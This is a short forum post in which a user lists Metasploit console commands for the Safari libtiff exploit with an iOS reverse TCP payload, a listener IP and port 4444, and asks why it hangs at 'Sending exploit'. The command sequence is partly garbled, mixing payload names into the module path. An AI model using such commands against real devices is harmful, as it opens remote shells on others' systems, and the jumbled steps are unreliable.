Forum Thread: Kali Linux - Metasploit - "safari_libtiff - Sending Exploit"

I wrote:

# msfconsole
# use appleios/aarch64/meterpreterreverse_tcp
# set payload osx/armle/execute/reverse_tcp
# set lhost (my ip)
# set lport 4444
# set uripath /test1
# exploit

"And stays stuck on "safari_libtiff - Sending exploit""

Did I make any mistakes?
You could give me some advice.

Be the First to Respond

Share Your Thoughts

  • Hot
  • Active